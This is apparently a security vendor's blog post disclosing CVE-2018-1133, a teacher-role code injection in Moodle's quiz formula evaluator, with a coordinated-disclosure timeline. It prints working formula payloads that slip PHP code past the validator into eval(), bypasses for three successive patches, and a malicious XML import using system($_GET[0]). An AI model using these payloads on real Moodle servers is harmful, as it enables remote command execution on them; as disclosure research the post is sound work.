Blog post

Evil Teacher: Code Injection in Moodle

Robin Peraglie photo

Robin Peraglie

Vulnerability Researcher

Date

  • Security
In this post we will examine the technical intrinsics of a critical vulnerability in the previous Moodle release (CVE-2018-1133).

Moodle is a widely-used open-source e-Learning software with more than 127 million users allowing teachers and students to digitally manage course activities and exchange learning material, often deployed by large universities. In this post we will examine the technical intrinsics of a critical vulnerability in the previous Moodle release (CVE-2018-1133).

Impact - Who can exploit what?

An attacker must be assigned the teacher role in a course of the latest Moodle (earlier than 3.5.0) running with default configurations. Escalating to this role via another vulnerability, such as XSS, would also be possible. Given these requirements and the knowledge of the vulnerability, the adversary will be able to execute arbitrary commands on the underlying operating system of the server running Moodle. By using a specially crafted math-formula which is evaluated by Moodle - the attacker bypasses an internal security mechanism that prevented the execution of malicious commands. In the following section, we will examine the technical details of the vulnerability.

Math formulas in Quiz component

Moodle allows teachers to set up a quiz with many types of questions. Among them is the calculated question which allows teachers to enter a mathematical formula that will be evaluated by Moodle dynamically on randomized input variables. This prevents students to cheat and simply share their results. For example, the teacher could type What is {x} added to {y}? with the answer formula being {x}+{y}. Moodle would then generate two random numbers and insert them for the placeholders {x} and {y} in the question and answer text (say 3.9+2.1). Finally, it would evaluate the answer 6.0 by calling the security-sensitive PHP function eval() on the formula input which is well-known for its malicious potential as it allows execution of arbitrary PHP code.


question/type/calculated/questiontype.php

1211    public function substitute_variables_and_eval($str, $dataset) {
1212        // substitues {x} and {y} for numbers like 1.2 with str_replace():
1213        $formula = $this->substitute_variables($str, $dataset);  
1214        if ($error = qtype_calculated_find_formula_errors($formula)) {     
1215            return $error;   // formula security mechanism
1216        }
1217        $str=null;
1218        eval('$str = '.$formula.';');	// dangerous eval()-call
1219        return $str;
1220    }

To enforce the usage of only harmless PHP code the developers of Moodle have introduced a validator function qtype_calculated_find_formula_errors() which is invoked before the dangerous eval() call with the intention of detecting illegal and malicious code in the formula provided by the teacher.


question/type/calculated/questiontype.php

1923    function qtype_calculated_find_formula_errors($formula) {
1924        // Returns false if everything is alright
1925        // otherwise it constructs an error message.
1926        // Strip away dataset names.
1927        while (preg_match('~\\{[[:alpha:]][^>} <{"\']*\\}~', $formula, $regs)){
1928            $formula = str_replace($regs[0], '1', $formula);
1929        }
1930
1931        // Strip away empty space and lowercase it.
1932        $formula = strtolower(str_replace(' ', '', $formula));
1933
1934        $safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
1935        $operatorornumber = "[{$safeoperatorchar}.0-9eE]";
1936
1937        // [...]
1938
1939        if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
1940            return get_string('illegalformulasyntax','qtype_calculated',$regs[0]);
1941        } else {
1942            // Formula just might be valid.
1943            return false;
1944        }
1945    }

Developing a Bypass

As you can see in the source code above, the last preg_match() call, here on line 1939, is very strict and will disallow any characters except -+/*%>:^\~<?=&|!.0-9eE left in our formula. However, a previous str_replace() nested inside a while loop on line 1927 will replace all placeholders in the formula similar to {x} for a 1 recursively. The corresponding regular expression indicates that placeholder names are barely limited in their character set considering that {system(ls)} is a valid placeholder and will also be replaced by 1 on line 1928. This fact points towards a weakness because it will hide all potentially malicious characters from the securing preg_match() call before the function would return false indicating a valid formula. Using this technique to hide malicious code and combining it with nested placeholders an exploitable vulnerability occurs.

Nr.Math FormulavalidityArgument of `eval()`result of `eval()`
1 `$_GET[0]`illegal

2{a.`$_GET[0]`}valid$str = 1.2;eval success
3 {a.`$_GET[0]`;{x}} valid$str= &#x7b;&#x61;&#x2e;&#x60;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x30;&#x5d;&#x60;&#x3b;&#x31;&#x2e;&#x32;&#x7d;&#x3b;PHP Syntax Error '{'
4 /*{a*/`$_GET[0]`;//{x}}valid$str= &#x2f;&#x2a;&#x7b;&#x61;&#x2a;&#x2f;&#x60;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x30;&#x5d;&#x60;&#x3b;&#x2f;&#x2f;1.2&#x7d;;eval success

The first malicious formula is denied by the validator qtype_calculated_find_formula_errors(). If we make it a placeholder and embed it in curly brackets as seen with the second payload, the validator will not detect our attack but Moodle will simply replace our placeholder with a random number 1.2 before it reaches eval(). However, if we introduce another placeholder and nest it right into the one we already have, Moodle will only substitute the inner placeholder and a dangerous leftover placeholder will reach eval() as seen on the third row of the table. At this point, our payload will throw a PHP syntax error due to the fact that the input of eval() is invalid PHP code. Therefore, we only have to correct the PHP syntax by excluding the invalid parts from the PHP parser with PHP comments resulting in our final valid formula on row four which finally allows code execution via the GET parameter 0.

Adapting to insufficient patches

After reporting the issue to Moodle they immediately responded and proposed a patch to quickly resolve the issue. However, after re-scanning the application with RIPS, our SAST solution still detected the same vulnerability pointing towards a bypass of the freshly introduced patch. After inspecting the associated source code and scanner results more precisely we were able to bypass the patch and achieve the same impact as before. This was possible for the first three proposed patches and we explain each bypass in the next sub-sections.

First patch: Blacklist

The first patch proposed by the Moodle developers was based on the idea of denying formulas containing PHP comments used in the exploit payload. As you can see in the code, the patch prepended a for each loop that checks if the formula contains specific strings.


question/type/calculated/questiontype.php

1923    function qtype_calculated_find_formula_errors($formula) {
1924        foreach (['//', '/*', '#'] as $commentstart) {
1925            if (strpos($formula, $commentstart) !== false) {
1926                return get_string('illegalformulasyntax',
1927                    'qtype_calculated', 
1928                    $commentstart);
1929            }
1930        }

This patch renders our current payload useless as the validator function qtype_calculated_find_formula_errors() detects the strings which initiate PHP comments //, /*, # used in our current exploit payload. This patch implemented a black-list approach and was based on the assumption that no attacker was able to correct the invalid PHP syntax of row and column 3 of the table above into valid PHP syntax without the usage of comments. However, the patch was insufficient and allowed exploitation of a more sophisticated version of this payload.

Math FormulaArgument of eval
1?><?=log(1){a.`$_GET[0]`.({x})}?>$str = &#x31;&#x3f;&#x3e;&#x3c;&#x3f;&#x3d;&#x6c;&#x6f;&#x67;&#x28;&#x31;&#x29;&#x7b;&#x61;&#x2e;&#x60;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x30;&#x5d;&#x60;&#x2e;&#x28;&#x7b;&#x78;&#x7d;&#x29;&#x7d;&#x3f;&#x3e;;

Second patch: Deny nested placeholders

The idea of the second patch was to prevent nested placeholders, which are used in our payload, by removing the “recursion” when detecting placeholders. But again, re-scanning the application with RIPS still reported the same vulnerability which led us to look at the following new code lines more precisely.


question/type/calculated/questiontype.php

1533    public function find_dataset_names($text) {
1534        // Returns the possible dataset names found in the text as an array.
1535        // The array has the dataset name for both key and value.
1536        if (preg_match_all(&#x27;~\\{([[:alpha:]][^&#x3E;} &#x3C;{&#x22;\&#x27;]*)\\}~&#x27;,$text,$regs)) {
1537            $datasetnames = array_unique($regs[1]);
1538            return array_combine($datasetnames, $datasetnames);
1539        } else {
1540            return [];
1541        }
1542    }
1543    [...]
1544    function qtype_calculated_find_formula_errors($formula) {
1545        $datasetnames = find_dataset_names($formula);
1546        foreach ($datasetnames as $datasetname) {
1547            $formula = str_replace(&#x27;{&#x27;.$datasetname.&#x27;}&#x27;, &#x27;1&#x27;, $formula);
1548        }

Whenever we input a nested placeholder {a{b}} the method qtype_calculated_find_formula_errors() now solely replaces the {b} as a placeholder and the leftover formula {a1} is detected as illegal. However, if we alter our formula to {b}{a1}{a{b}} exactly two placeholders {b} and {a1} are detected and returned by the function find_dataset_names(). One after another, each placeholder is replaced in the foreach loop beginning with our{b}and leaving our formula with 1{a1}{a1}. Finally, after replacing {a1} the formula equals 111 and the validator approves the nested placeholders and thus breaking the intention of this patch. With this trick in mind we only had to adapt our last payload appropriately to get the same critical effects as before:

formula/*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/
input of eval&#x24;&#x73;&#x74;&#x72;&#x20;&#x3d;&#x20;&#x2f;&#x2a;&#x7b;&#x78;&#x7d;&#x7b;&#x61;&#x2a;&#x2f;&#x60;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x30;&#x5d;&#x60;&#x2f;&#x2a;&#x28;&#x31;&#x29;&#x2f;&#x2f;&#x7d;&#x7b;&#x61;&#x2a;&#x2f;&#x60;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x30;&#x5d;&#x60;&#x2f;&#x2a;&#x28;&#x7b;&#x78;&#x7d;&#x29;&#x2f;&#x2f;&#x7d;&#x2a;&#x2f;&#x3b;

Third patch: Blacklist and Linear Replacement

The third patch combines the first two approaches and looked really good in preventing nested placeholders. However, if an attacker targeted the import feature of the Quiz component and re-imported a maliciously sabotaged XML question-file, the attacker was able to control the $dataset argument of substitute_variables()(see above) and nullify the placeholder substitution.


Abstract malicious XML file

1942    <quiz>
1943        <question type="calculated">
1944            [...]
1945            <answer fraction="100">
1946                <text>log(1){system($_GET[0])}</text>
1947            </answer>
1948        </question>
1949        <dataset_definitions>
1950            <dataset_definition>
1951                <name><text>x</text></name>
1952            </dataset_definition>
1953        </dataset_definitions>
1954    </quiz>

The highlighted lines show that the XML file defines the name of the placeholder {x} on line 1951. This placeholder is never used in the formula on line 1946. This will nullify the substitution of our dangerous placeholder {system($_GET[0])} and result in the same code injection vulnerability which we had on the previous patches.

Fourth patch

Unfortunately, we were not able to fully verify the completeness of the fourth patch due to time restrictions. We are going to update this blog post if this changes and of course notify the developers beforehand.

Timetable

DateEvent
01/May/18First Contact with Vendor
01/May/18Insufficient patch #1 proposed
02/May/18Bypass #1 reported and acknowledged
07/May/18Insufficient patch #2 proposed
08/May/18Bypass #2 reported and acknowledged
12/May/18Insufficient patch #3 proposed
15/May/18Bypass #3 proposed and acknowledged
16/May/18Patch #4 proposed
17/May/18Fix released

Summary

In this post, we looked at a critical vulnerability in Moodle. Moodle is often integrated into larger systems joining a WebMailer, eLearning Platforms and further technologies into a single architecture with shared account credentials spanning a great attack surface for unauthenticated attackers to phish or extract the credentials of a teacher account. On some occasions, an automated service for requesting a Moodle course exists, which will leverage a student right into the position where he can execute malicious software of his choice and grade himself a long-term A in his attended university-courses.


With the help of automated security analysis, not only the vulnerability itself but also the insufficient patches were reported within 10 minutes which can save many hours of rework. We would like to thank the Moodle team for their very fast response and collaboration on patching the issue. We highly recommend updating your instances to the newest version immediately.

Related Posts